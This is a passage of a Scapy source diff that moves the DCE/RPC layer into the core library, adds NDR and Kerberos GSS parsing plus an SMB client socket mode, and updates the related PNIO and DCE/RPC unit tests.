ByteField, + ConditionalField, + Field, + FieldLenField, + FieldListField, + FlagsField, + IntField, + LEIntField, + LELongField, + LenField, + MultipleTypeField, + PacketField, + PacketLenField, + PacketListField, + PadField, + ReversePadField, + ShortEnumField, + ShortField, + StrFixedLenField, + StrLenField, + StrLenFieldUtf16, + TrailerField, + UUIDEnumField, + UUIDField, + XByteField, + XLEIntField, + XShortField, +) +from scapy.layers.inet import TCP + +from scapy.contrib.rtps.common_types import ( + EField, + EPacket, + EPacketField, + EPacketListField, +) +# from scapy.supersocket import StreamSocket + + +# DCE/RPC Packet +DCE_RPC_TYPE = { + 0: "request", + 1: "ping", + 2: "response", + 3: "fault", + 4: "working", + 5: "no_call", + 6: "reject", + 7: "acknowledge", + 8: "connectionless_cancel", + 9: "frag_ack", + 10: "cancel_ack", + 11: "bind", + 12: "bind_ack", + 13: "bind_nak", + 14: "alter_context", + 15: "alter_context_resp", + 17: "shutdown", + 18: "co_cancel", + 19: "orphaned", +} +_DCE_RPC_4_FLAGS1 = [ + "reserved_01", + "last_frag", + "frag", + "no_frag_ack", + "maybe", + "idempotent", + "broadcast", + "reserved_7", +] +_DCE_RPC_4_FLAGS2 = [ + "reserved_0", + "cancel_pending", + "reserved_2", + "reserved_3", + "reserved_4", + "reserved_5", + "reserved_6", + "reserved_7", +] + + +def _dce_rpc_endianess(pkt): + """ + Determine the right endianness sign for a given DCE/RPC packet + """ + if pkt.endian == 0: # big endian + return ">" + elif pkt.endian == 1: # little endian + return "<" + else: + return "!" + + +class _EField(EField): + def __init__(self, fld): + super(_EField, self).__init__(fld, endianness_from=_dce_rpc_endianess) + + +class DceRpc(Packet): + """DCE/RPC packet""" + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 1: + ver = ord(_pkt[0:1]) + if ver == 4: + return DceRpc4 + elif ver == 5: + return DceRpc5 + return DceRpc5 + + +bind_bottom_up(TCP, DceRpc, sport=135) +bind_layers(TCP, DceRpc, dport=135) + + +class _DceRpcPayload(Packet): + @property + def endianness(self): + if not self.underlayer: + return "!" + return _dce_rpc_endianess(self.underlayer) + + +# sect 12.5 + +_drep = [ + BitEnumField("endian", 0, 4, ["big", "little"]), + BitEnumField("encoding", 0, 4, ["ASCII", "EBCDIC"]), + ByteEnumField("float", 0, ["IEEE", "VAX", "CRAY", "IBM"]), + ByteField("reserved1", 0), +] + + +class DceRpc4(Packet): + """ + DCE/RPC v4 'connection-less' packet + """ + + name = "DCE/RPC v4" + fields_desc = ( + [ + ByteEnumField( + "rpc_vers", 4, {4: "4 (connection-less)", 5: "5 (connection-oriented)"} + ), + ByteEnumField("ptype", 0, DCE_RPC_TYPE), + FlagsField("flags1", 0, 8, _DCE_RPC_4_FLAGS1), + FlagsField("flags2", 0, 8, _DCE_RPC_4_FLAGS2), + ] + + _drep + + [ + XByteField("serial_hi", 0), + _EField(UUIDField("object", None)), + _EField(UUIDField("if_id", None)), + _EField(UUIDField("act_id", None)), + _EField(IntField("server_boot", 0)), + _EField(IntField("if_vers", 1)), + _EField(IntField("seqnum", 0)), + _EField(ShortField("opnum", 0)), + _EField(XShortField("ihint", 0xFFFF)), + _EField(XShortField("ahint", 0xFFFF)), + _EField(LenField("len", None, fmt="H")), + _EField(ShortField("fragnum", 0)), + ByteEnumField("auth_proto", 0, ["none", "OSF DCE Private Key"]), + XByteField("serial_lo", 0), + ] + ) + + +# sect 13.2.6.1 + + +class CommonAuthVerifier(Packet): + name = "Common Authentication Verifier (auth_verifier_co_t)" + fields_desc = [ + ReversePadField( + ByteEnumField( + "auth_type", + 0, + { + 9: "SPNEGO", + }, + ), + align=4, + ), + ByteField("auth_level", 0), + ByteField("auth_pad_length", 0), + ByteField("auth_reserved", 0), + XLEIntField("auth_context_id", 0), + MultipleTypeField( + [ + ( + PacketLenField( + "auth_value", + GSSAPI_BLOB(), + GSSAPI_BLOB, + length_from=lambda pkt: pkt.parent.auth_len, + ), + lambda pkt: pkt.auth_type == 9, + ) + ], + PacketLenField( + "auth_value", + None, + conf.raw_layer, + length_from=lambda pkt: pkt.parent.auth_len, + ), + ), + ] + + +# sect 12.6 + + +_DCE_RPC_5_FLAGS = { + 0x01: "FIRST_FRAG", + 0x02: "LAST_FRAG", + 0x04: "PENDING_CANCEL", + 0x10: "CONC_MPX", + 0x20: "DID_NOT_EXECUTE", + 0x40: "MAYBE", + 0x80: "OBJECT_UUID", +} + + +class DceRpc5(Packet): + """ + DCE/RPC v5 'connection-oriented' packet + """ + + name = "DCE/RPC v5" + fields_desc = ( + [ + ByteEnumField( + "rpc_vers", 5, {4: "4 (connection-less)", 5: "5 (connection-oriented)"} + ), + ByteField("rpc_vers_minor", 1), + ByteEnumField("ptype", 0, DCE_RPC_TYPE), + FlagsField("pfc_flags", 0, 8, _DCE_RPC_5_FLAGS), + ] + + _drep + + [ + ByteField("reserved2", 0), + _EField(LenField("frag_len", None, fmt="H")), + _EField(LenField("auth_len", None, fmt="H")), + _EField(IntField("call_id", None)), + ConditionalField( + TrailerField( + PacketLenField( + "auth_verifier", + None, + CommonAuthVerifier, + length_from=lambda pkt: pkt.auth_len + 8, + ) + ), + lambda pkt: pkt.auth_len, + ), + ] + ) + + +# sec 12.6.3.1 + +DCE_RPC_INTERFACES_NAMES = {} +DCE_RPC_INTERFACES_NAMES_rev = {} + + +class DceRpc5AbstractSyntax(EPacket): + name = "Presentation Syntax (p_syntax_id_t)" + fields_desc = [ + _EField( + UUIDEnumField( + "if_uuid", + None, + ( + # Those are dynamic + DCE_RPC_INTERFACES_NAMES.get, + DCE_RPC_INTERFACES_NAMES_rev.get, + ), + ) + ), + _EField(ShortField("if_version", 3)), + _EField(ShortField("if_version_minor", 0)), + ] + + +class DceRpc5TransferSyntax(EPacket): + name = "Presentation Transfer Syntax (p_syntax_id_t)" + fields_desc = [ + _EField( + UUIDEnumField( + "if_uuid", + None, + { + UUID("8a885d04-1ceb-11c9-9fe8-08002b104860"): "NDR 2.0", + UUID("71710533-beba-4937-8319-b5dbef9ccc36"): "NDR64", + }, + ) + ), + _EField(ShortField("if_version", 3)), + _EField(ShortField("reserved", 0)), + ] + + +class DceRpc5Context(EPacket): + name = "Presentation Context (p_cont_elem_t)" + fields_desc = [ + _EField(ShortField("context_id", 0)), + FieldLenField("n_transfer_syn", None, length_of="transfer_syntaxes", fmt="B"), + ByteField("reserved", 0), + EPacketField("abstract_syntax", None, DceRpc5AbstractSyntax), + EPacketListField( + "transfer_syntaxes", + None, + DceRpc5TransferSyntax, + count_from=lambda pkt: pkt.n_transfer_syn, + endianness_from=_dce_rpc_endianess, + ), + ] + + +class DceRpc5Result(EPacket): + name = "Context negotiation Result" + fields_desc = [ + _EField( + ShortEnumField( + "result", 0, ["acceptance", "user_rejection", "provider_rejection"] + ) + ), + _EField( + ShortEnumField( + "reason", + 0, + [ + "reason_not_specified", + "abstract_syntax_not_supported", + "proposed_transfer_syntaxes_not_supported", + "local_limit_exceeded", + ], + ) + ), + EPacketField("transfer_syntax", None, DceRpc5TransferSyntax), + ] + + +class DceRpc5PortAny(EPacket): + name = "Port Any (port_any_t)" + fields_desc = [ + _EField(FieldLenField("length", None, length_of="port_spec", fmt="H")), + _EField(StrLenField("port_spec", b"", length_from=lambda pkt: pkt.length)), + ] + + +# sec 12.6.4.1 + + +class DceRpc5AlterContext(_DceRpcPayload): + name = "DCE/RPC v5 - AlterContext" + fields_desc = [ + _EField(ShortField("max_xmit_frag", 0)), + _EField(ShortField("max_recv_frag", 0)), + _EField(IntField("assoc_group_id", 0)), + # p_result_list_t + _EField(FieldLenField("n_results", None, length_of="results", fmt="B")), + StrFixedLenField("reserved", 0, length=3), + EPacketListField( + "results", [], DceRpc5Result, endianness_from=_dce_rpc_endianess + ), + ] + + +bind_layers(DceRpc5, DceRpc5AlterContext, ptype=14) + + +# sec 12.6.4.2 + + +class DceRpc5AlterContextResp(_DceRpcPayload): + name = "DCE/RPC v5 - AlterContextResp" + fields_desc = [ + _EField(ShortField("max_xmit_frag", 0)), + _EField(ShortField("max_recv_frag", 0)), + _EField(IntField("assoc_group_id", 0)), + PadField( + EPacketField("sec_addr", None, DceRpc5PortAny), + align=4, + ), + # p_result_list_t + _EField(FieldLenField("n_results", None, length_of="results", fmt="B")), + StrFixedLenField("reserved", 0, length=3), + EPacketListField( + "results", [], DceRpc5Result, endianness_from=_dce_rpc_endianess + ), + ] + + +bind_layers(DceRpc5, DceRpc5AlterContextResp, ptype=15) + +# sec 12.6.4.3 + + +class DceRpc5Bind(_DceRpcPayload): + name = "DCE/RPC v5 - Bind" + fields_desc = [ + _EField(ShortField("max_xmit_frag", 0)), + _EField(ShortField("max_recv_frag", 0)), + _EField(IntField("assoc_group_id", 0)), + # p_cont_list_t + _EField( + FieldLenField("n_context_elem", None, length_of="context_elem", fmt="B") + ), + StrFixedLenField("reserved", 0, length=3), + EPacketListField( + "context_elem", + [], + DceRpc5Context, + endianness_from=_dce_rpc_endianess, + count_from=lambda pkt: pkt.n_context_elem, + ), + ] + + +bind_layers(DceRpc5, DceRpc5Bind, ptype=11) + +# sec 12.6.4.4 + + +class DceRpc5BindAck(_DceRpcPayload): + name = "DCE/RPC v5 - Bind Ack" + fields_desc = [ + _EField(ShortField("max_xmit_frag", 0)), + _EField(ShortField("max_recv_frag", 0)), + _EField(IntField("assoc_group_id", 0)), + PadField( + EPacketField("sec_addr", None, DceRpc5PortAny), + align=4, + ), + # p_result_list_t + _EField(FieldLenField("n_results", None, length_of="results", fmt="B")), + StrFixedLenField("reserved", 0, length=3), + EPacketListField( + "results", [], DceRpc5Result, endianness_from=_dce_rpc_endianess + ), + ] + + +bind_layers(DceRpc5, DceRpc5BindAck, ptype=12) + +# sec 12.6.4.9 + + +class DceRpc5Request(_DceRpcPayload): + name = "DCE/RPC v5 - Request" + fields_desc = [ + _EField(IntField("alloc_hint", 0)), + _EField(ShortField("cont_id", 0)), + _EField(ShortField("opnum", 0)), + ConditionalField( + PadField( + _EField(UUIDField("object", None)), + align=8, + ), + lambda pkt: pkt.underlayer.pfc_flags.OBJECT_UUID, + ), + ] + + +bind_layers(DceRpc5, DceRpc5Request, ptype=0) + +# sec 12.6.4.10 + + +class DceRpc5Response(_DceRpcPayload): + name = "DCE/RPC v5 - Response" + fields_desc = [ + _EField(IntField("alloc_hint", 0)), + _EField(ShortField("cont_id", 0)), + ByteField("cancel_count", 0), + ByteField("reserved", 0), + ] + + +bind_layers(DceRpc5, DceRpc5Response, ptype=2) + +# --- API + +DceRpcOp = namedtuple("DceRpcOp", ["request", "response"]) +DCE_RPC_INTERFACES = {} + + +def register_dcerpc_interface(name, uuid, version, opnums): + """ + Register a DCE/RPC interface + """ + if uuid in DCE_RPC_INTERFACES: + raise ValueError("Interface is already registered !") + DCE_RPC_INTERFACES_NAMES[uuid] = "%s (v%s)" % (name.upper(), version) + DCE_RPC_INTERFACES_NAMES_rev[name.upper()] = uuid + DCE_RPC_INTERFACES[uuid] = { + "name": name, + "uuid": uuid, + "version": version, + "opnums": opnums, + } + + +# --- NDR fields + + +class NDRPacket(Packet): + """ + A NDR Packet. Handles pointer size & endianness + """ + + __slots__ = ["ndr64"] + + def __init__(self, *args, **kwargs): + self.ndr64 = kwargs.pop("ndr64", False) + super(NDRPacket, self).__init__(*args, **kwargs) + + def _update_fields(self): + _up = self.parent or self.underlayer + if _up and isinstance(_up, NDRPacket): + self.ndr64 = _up.ndr64 + ptr_fmt = "<" + (self.ndr64 and "Q" or "I") + for f in self.fields_desc: + if isinstance(f, _NDR64Field): + f.set_fmt(ptr_fmt) + else: + f.fmt = "<" + (f.fmt[1:] if f.fmt[0] in ["!", "<", ">"] else f.fmt) + + def build(self): + self._update_fields() + return super(NDRPacket, self).build() + + def dissect(self, s): + self._update_fields() + return super(NDRPacket, self).dissect(s) + + def default_payload_class(self, pkt): + return conf.padding_layer + + +class NDRAlign(PadField): + """ + PadField but aligned on the size of the field. + """ + + def __init__(self, fld, **kwargs): + super(NDRAlign, self).__init__(fld, fld.sz, **kwargs) + + +class _NDR64Field: + def set_fmt(self, fmt): + self.fmt = fmt + self.sz = struct.calcsize(self.fmt) + + +class NDRPointer(NDRPacket): + fields_desc = [ + MultipleTypeField( + [(LELongField("referent_id", 1), lambda pkt: pkt.ndr64)], + LEIntField("referent_id", 1), + ), + PacketField("value", None, conf.raw_layer), + ] + + +class NDRPointerField(_FieldContainer, _NDR64Field): + """ + A NDR pointer field encapsulation + """ + + def __init__(self, fld, fmt="I"): + self.fld = fld + self.set_fmt(fmt) + + def getfield(self, pkt, s): + if s[: self.sz] == b"\0" * self.sz: + return s[self.sz:], None + referent_id = struct.unpack(self.fmt, s[: self.sz])[0] + remain, val = self.fld.getfield(pkt, s[self.sz:]) + return remain, NDRPointer(ndr64=pkt.ndr64, referent_id=referent_id, value=val) + + def addfield(self, pkt, s, val): + if val is None: + return s + b"\0" * self.sz + return s + bytes(val) + + +class _NDRPacketListField(PacketListField): + """ + A PacketListField that can optionally pack the packets into NDRPointers + """ + + __slots__ = ["ptr_pack"] + + def __init__(self, *args, **kwargs): + self.ptr_pack = kwargs.pop("ptr_pack", False) + super(_NDRPacketListField, self).__init__(*args, **kwargs) + + def m2i(self, pkt, s): + if not self.ptr_pack: + return super(_NDRPacketListField, self).m2i(pkt, s) + if s[: self.sz] == b"\0" * self.sz: + return s[self.sz:], 0 + referent_id = struct.unpack(self.fmt, s[: self.sz])[0] + return NDRPointer( + referent_id=referent_id, + value=super(_NDRPacketListField, self).m2i(pkt, s[self.sz:]), + ) + + def i2m(self, pkt, val): + if not self.ptr_pack: + return super(_NDRPacketListField, self).i2m(pkt, val) + if val is None: + return b"\0" * self.sz + super(_NDRPacketListField, self).i2m(pkt, val) + return bytes(val) + + +class NDRVaryingArray(NDRPacket): + fields_desc = [ + MultipleTypeField( + [(LELongField("offset", 0), lambda pkt: pkt.ndr64)], + LEIntField("offset", 0), + ), + MultipleTypeField( + [ + ( + FieldLenField("actual_count", None, fmt="= 2: + if _pkt[:2] == b"\x01\x01": + return KRB5_GSS_GetMIC_RFC1964 + elif _pkt[:2] == b"\x02\x01": + return KRB5_GSS_Wrap_RFC1964 + elif _pkt[:2] == b"\x01\x02": + return KRB5_GSS_Delete_sec_context_RFC1964 + elif _pkt[:2] == b"\x04\x04": + return KRB5_GSS_GetMIC + elif _pkt[:2] == b"\x05\x04": + return KRB5_GSS_Wrap + return KRB5_GSS_Wrap diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index e4933a9903c..2193d80cf10 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -1322,6 +1322,7 @@ def __init__(self, *args, **kwargs): self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) self.ALLOW_SMB2 = kwargs.pop("ALLOW_SMB2", True) self.REAL_HOSTNAME = kwargs.pop("REAL_HOSTNAME", None) + self.RETURN_SOCKET = kwargs.pop("RETURN_SOCKET", None) self.RUN_SCRIPT = kwargs.pop("RUN_SCRIPT", None) self.SMB2 = False super(NTLM_SMB_Client, self).__init__(*args, **kwargs) @@ -1616,12 +1617,14 @@ def receive_setup_andx_response(self, pkt): def AUTHENTICATED(self): pass - @ATMT.condition(AUTHENTICATED) - def should_run_script(self): + @ATMT.condition(AUTHENTICATED, prio=0) + def authenticated_post_actions(self): + if self.RETURN_SOCKET: + raise self.SOCKET_MODE() if self.RUN_SCRIPT: raise self.DO_RUN_SCRIPT() - @ATMT.receive_condition(AUTHENTICATED) + @ATMT.receive_condition(AUTHENTICATED, prio=1) def receive_packet(self, pkt): raise self.AUTHENTICATED().action_parameters(pkt) @@ -1648,3 +1651,24 @@ def DO_RUN_SCRIPT(self): self.send(pkt) # ... run something? self.end() + + @ATMT.state() + def SOCKET_MODE(self): + pass + + @ATMT.receive_condition(SOCKET_MODE) + def incoming_data_received(self, pkt): + raise self.SOCKET_MODE().action_parameters(pkt) + + @ATMT.action(incoming_data_received) + def receive_data(self, pkt): + self.oi.smbpipe.send(bytes(pkt)) + + @ATMT.ioevent(SOCKET_MODE, name="smbpipe", as_supersocket="smblink") + def outgoing_data_received(self, fd): + raise self.ESTABLISHED().action_parameters(fd.recv()) + + @ATMT.action(outgoing_data_received) + def send_data(self, d): + self.smb_header.MID += 1 + self.send(self.smb_header.copy() / d) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index be2de81e1c3..37f9f0f9933 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -1210,9 +1210,10 @@ def m2i(self, pkt, m): # sect 2.2.31 -class SMB2_IOCTL_Request(Packet): +class SMB2_IOCTL_Request(_NTLMPayloadPacket): name = "SMB2 IOCTL Request" OFFSET = 56 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" deprecated_fields = { "IntputCount": ("InputLen", "alias"), "OutputCount": ("OutputLen", "alias"), @@ -1278,7 +1279,7 @@ def post_build(self, pkt, pay): class SMB2_IOCTL_Response(Packet): - name = "SMB2 IOCTL Request" + name = "SMB2 IOCTL Response" # Barely implemented StructureSize = 0x31 fields_desc = ( diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index f1ebb306803..5921337bc01 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -2,7 +2,7 @@ + Syntax check = Import the PNIO RPC layer -from scapy.contrib.dce_rpc import * +from scapy.layers.dcerpc import * from scapy.contrib.pnio import * from scapy.contrib.pnio_rpc import * from scapy.libs.six import itervalues @@ -537,7 +537,7 @@ p[AlarmCRBlockRes].LocalAlarmReference == 0x0003 = PNIOServiceReqPDU basic example * PNIOServiceReqPDU must always be placed above a DCE/RPC layer as it requires the endianness field -p = DceRpc() / PNIOServiceReqPDU(blocks=[ +p = DceRpc4() / PNIOServiceReqPDU(blocks=[ Block(load=b'\x01\x02') ]) s = bytes(p) @@ -548,7 +548,7 @@ s[:18] + s[24:] == \ '0000000401000102') = PNIOServiceReqPDU dissection -p = DceRpc( +p = DceRpc4( bytes(bytearray.fromhex('0400000000000000dea000006c9711d18271010203040506dea000016c9711d1827100a02442df7d000000000000000000000000000000000000000000000001000000000000ffffffff001c00000000' + \ '0000000f000000080000000f0000000000000008' + \ '0000000401000102ef') @@ -567,7 +567,7 @@ bytes(p.payload) == bytes(PNIOServiceReqPDU(args_length=8, args_max=15, max_coun = PNIOServiceResPDU basic example * PNIOServiceResPDU must always be placed above a DCE/RPC layer as it requires the endianness field -p = DceRpc() / PNIOServiceResPDU(blocks=[ +p = DceRpc4() / PNIOServiceResPDU(blocks=[ Block(load=b'\x01\x02') ]) s = bytes(p) @@ -578,7 +578,7 @@ s[:18] + s[24:] == \ '0000000401000102') = PNIOServiceResPDU dissection -p = DceRpc( +p = DceRpc4( bytes(bytearray.fromhex('0402000000000000dea000006c9711d18271010203040506dea000026c9711d1827100a02442df7d000000000000000000000000000000000000000000000001000000000000ffffffff001c00000000' + \ '00001234000000080000000f0000000000000008' + \ '0000000401000102ef') @@ -597,10 +597,10 @@ bytes(p.payload) == bytes(PNIOServiceResPDU(status=0x1234, args_length=8, max_co #### Connect Request = A PNIO RPC Connect Request -p = DceRpc( - endianness='little', opnum=0, sequence_num=0, - object_uuid='dea00000-6c97-11d1-8271-010203040506', - activity='01234567-89ab-cdef-0123-456789abcdef' +p = DceRpc4( + endian='little', opnum=0, seqnum=0, + object='dea00000-6c97-11d1-8271-010203040506', + act_id='01234567-89ab-cdef-0123-456789abcdef' ) / PNIOServiceReqPDU( blocks=[ # AR block @@ -706,10 +706,10 @@ bytes(p) == bytearray.fromhex( #### Write Request = A PNIO RPC Write Request -p = DceRpc( - endianness='little', opnum=2, sequence_num=1, - object_uuid='dea00000-6c97-11d1-8271-010203040506', - activity='01234567-89ab-cdef-0123-456789abcdef' +p = DceRpc4( + endian='little', opnum=2, seqnum=1, + object='dea00000-6c97-11d1-8271-010203040506', + act_id='01234567-89ab-cdef-0123-456789abcdef' ) / PNIOServiceReqPDU( blocks=[ IODWriteMultipleReq( @@ -741,10 +741,10 @@ bytes(p) == bytearray.fromhex( #### PrmEnd control Request = A PNIO RPC PrmEnd Control Request -p = DceRpc( - endianness='little', opnum=0, sequence_num=2, - object_uuid='dea00000-6c97-11d1-8271-010203040506', - activity='01234567-89ab-cdef-0123-456789abcdef' +p = DceRpc4( + endian='little', opnum=0, seqnum=2, + object='dea00000-6c97-11d1-8271-010203040506', + act_id='01234567-89ab-cdef-0123-456789abcdef' ) / PNIOServiceReqPDU( blocks=[ IODControlReq(ARUUID='fedcba98-7654-3210-fedc-ba9876543210', SessionKey=0, ControlCommand_PrmEnd=1) @@ -757,11 +757,11 @@ bytes(p) == bytearray.fromhex( #### ApplicationReady control Request = A PNIO RPC PrmEnd Control Request -p = DceRpc( - endianness='little', opnum=0, sequence_num=0, - object_uuid='dea00000-6c97-11d1-8271-060504030201', - activity='01020304-0506-0708-090a-0b0c0d0e0f00', - interface_uuid=RPC_INTERFACE_UUID['UUID_IO_ControllerInterface'], +p = DceRpc4( + endian='little', opnum=0, seqnum=0, + object='dea00000-6c97-11d1-8271-060504030201', + act_id='01020304-0506-0708-090a-0b0c0d0e0f00', + if_id=RPC_INTERFACE_UUID['UUID_IO_ControllerInterface'], ) / PNIOServiceReqPDU( blocks=[ IODControlReq(ARUUID='fedcba98-7654-3210-fedc-ba9876543210', SessionKey=0, ControlCommand_ApplicationReady=1) @@ -845,7 +845,7 @@ raw = bytearray.fromhex('0402280000000000dea000006c9711d182710001000305f9dea0000 '000000000000000000000000000000000000000000002020024010000' \ '00000080020224000c010000000000000100000000021b00080100000' \ '000010000') -p = DceRpc(raw) +p = DceRpc4(raw) assert(p[PDPortDataAdjust].subslotNumber == 0x8002) assert(p[AdjustPeerToPeerBoundary].peerToPeerBoundary == 0x1) assert(LINKSTATE_LINK[p[AdjustLinkState].LinkState] == 'Up') diff --git a/test/contrib/dce_rpc.uts b/test/scapy/layers/dcerpc.uts similarity index 50% rename from test/contrib/dce_rpc.uts rename to test/scapy/layers/dcerpc.uts index 15ee5c1df3a..466f744ec85 100644 --- a/test/contrib/dce_rpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -3,71 +3,89 @@ + Syntax check = Import the DCE/RPC layer import re -from scapy.contrib.dce_rpc import * +from scapy.layers.dcerpc import * from uuid import UUID -+ Check EndiannessField ++ Check EField = Little Endian IntField getfield -f = EndiannessField(IntField('f', 0), lambda p: '<') +f = EField(IntField('f', 0), '<') f.getfield(None, hex_bytes('0102030405')) == (b'\x05', 0x04030201) = Little Endian IntField addfield -f = EndiannessField(IntField('f', 0), lambda p: '<') +f = EField(IntField('f', 0), '<') f.addfield(None, b'\x01', 0x05040302) == hex_bytes('0102030405') = Big Endian IntField getfield -f = EndiannessField(IntField('f', 0), lambda p: '>') +f = EField(IntField('f', 0), '>') f.getfield(None, hex_bytes('0102030405')) == (b'\x05', 0x01020304) = Big Endian IntField addfield -f = EndiannessField(IntField('f', 0), lambda p: '>') +f = EField(IntField('f', 0), '>') f.addfield(None, b'\x01', 0x02030405) == hex_bytes('0102030405') = Little Endian StrField getfield -f = EndiannessField(StrField('f', 0), lambda p: '<') +f = EField(StrField('f', 0), '<') f.getfield(None, '0102030405') == (b'', '0102030405') = Little Endian StrField addfield -f = EndiannessField(StrField('f', 0), lambda p: '<') +f = EField(StrField('f', 0), '<') f.addfield(None, b'01', '02030405') == b'0102030405' = Big Endian StrField getfield -f = EndiannessField(StrField('f', 0), lambda p: '>') +f = EField(StrField('f', 0), '>') f.getfield(None, '0102030405') == (b'', '0102030405') = Big Endian StrField addfield -f = EndiannessField(StrField('f', 0), lambda p: '>') +f = EField(StrField('f', 0), '>') f.addfield(None, b'01', '02030405') == b'0102030405' = Little Endian UUIDField getfield * The endianness of a UUIDField should be apply by block on each block in * parenthesis '(01234567)-(89ab)-(cdef)-(01)(23)-(45)(67)(89)(ab)(cd)(ef)' -f = EndiannessField(UUIDField('f', None), lambda p: '<') +f = EField(UUIDField('f', None), '<') f.getfield(None, hex_bytes('0123456789abcdef0123456789abcdef')) == (b'', UUID('67452301-ab89-efcd-0123-456789abcdef')) = Little Endian UUIDField addfield -f = EndiannessField(UUIDField('f', '01234567-89ab-cdef-0123-456789abcdef'), lambda p: '<') +f = EField(UUIDField('f', '01234567-89ab-cdef-0123-456789abcdef'), '<') f.addfield(None, b'', f.default) == hex_bytes('67452301ab89efcd0123456789abcdef') = Big Endian UUIDField getfield -f = EndiannessField(UUIDField('f', None), lambda p: '>') +f = EField(UUIDField('f', None), '>') f.getfield(None, hex_bytes('0123456789abcdef0123456789abcdef')) == (b'', UUID('01234567-89ab-cdef-0123456789abcdef')) = Big Endian UUIDField addfield -f = EndiannessField(UUIDField('f', '01234567-89ab-cdef-0123-456789abcdef'), lambda p: '>') +f = EField(UUIDField('f', '01234567-89ab-cdef-0123-456789abcdef'), '>') f.addfield(None, b'', f.default) == hex_bytes('0123456789abcdef0123456789abcdef') ++ DCE/RPC v5 -+ Check DCE/RPC layer += Dissect DCE/RPC v5 Request with Kerberos GSSAPI/RFC1964 + +pkt = DceRpc(b"\x05\x00\x00\x03\x10\x00\x00\x00\xcd\x00-\x00\x01\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00j\x87\xb4\xa8DrE3\xfa\xc1\x1d\x9e\xb7\x8a_\xffr\xbe\x13\xc4<\x85\xf0\xf2'y\x84t%u|e\xef/\x04\xb0m\x98\xb1\xd2\x00KwW#P\x8f2\xecB\x81\x19\xf3g\xd2o[\x07L-\xb8\x89\x05\xcf?\xcf\t\xeb\xb3&&6\xb7\x84\xb6\xcd8Ao\x8c\x94\xca\x03\xe3\x0e\x86'-\xfaHj\xcez\xf0A\x83\x9dX\r\xe8\x96\x07Bs\xaf\x9c[=2\x9eS\xb1\x18\x84 \xb4y\n9\xdf\x92\x1c\xd8\xe2e\xd3^,\t\x06\x08\x00pj\x8f\x04`+\x06\t*\x86H\x86\xf7\x12\x01\x02\x02\x02\x01\x11\x00\x10\x00\xff\xffp\xc0\\m\xfe\xa4\xe1!\xf7\xdf\xbf\xa4\xad\xdf\xcb\x16\x1e\xb5+{\x97\xaf\xd5~") +assert pkt.auth_verifier.auth_type == 9 +assert pkt.auth_verifier.auth_value.MechType.oidname == 'Kerberos 5' +assert isinstance(pkt.auth_verifier.auth_value.innerContextToken, KRB5_GSS_Wrap_RFC1964) +assert DceRpc5Request in pkt +assert pkt[DceRpc5Request].alloc_hint == 120 +assert pkt[DceRpc5Request].opnum == 0 + += Dissect DCE/RPC v5 Request EPM map request + +pkt = Ether(b'\x00\x0c)\xe1\xde{\x00\x0c)\x05\xe0\xd9\x08\x00E\x00\x00\xc4"\x92@\x00\x80\x06\xb3\x86\n\x01\x0f\x19\n\x01\x01\x01\x05=\x00\x87\x1e\x1b\x8f\x12\x02\x8ee\x19P\x18\xff\xb7 ^\x00\x00\x05\x00\x00\x03\x10\x00\x00\x00\x9c\x00\x00\x00\x01\x00\x00\x00\x84\x00\x00\x00\x00\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00K\x00\x00\x00K\x00\x00\x00\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\x00\x87\x01\x00\t\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00') +assert pkt.auth_verifier is None +assert pkt[DceRpc5Request].alloc_hint == 132 +assert pkt[DceRpc5Request].opnum == 3 + ++ Check DCE/RPC 4 layer = DCE/RPC default values -bytes(DceRpc()) == hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000ffffffff000000000000') +bytes(DceRpc4()) == hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000ffffffff000000000000') = DCE/RPC payload length computation -bytes(DceRpc() / b'\x00\x01\x02\x03') == hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000ffffffff00040000000000010203') +bytes(DceRpc4() / b'\x00\x01\x02\x03') == hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000ffffffff00040000000000010203') = DCE/RPC Guess payload class fallback with no possible payload p = DceRpc(hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000ffffffff00040000000000010203')) @@ -75,7 +93,7 @@ p.payload.__class__ == conf.raw_layer = DCE/RPC Guess payload class to a registered heuristic payload * A payload to be valid must implement the method can_handle and be registered to DceRpcPayload -from scapy.contrib.dce_rpc import *; import binascii, re +from scapy.layers.dcerpc import *; import binascii, re class DummyPayload(Packet): fields_desc = [StrField('load', '')] @classmethod @@ -85,7 +103,7 @@ class DummyPayload(Packet): else: return False -DceRpcPayload.register_possible_payload(DummyPayload) +DceRpc4Payload.register_possible_payload(DummyPayload) p = DceRpc(hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000ffffffff00040000000001020304')) p.payload.__class__ == DummyPayload @@ -94,8 +112,8 @@ p = 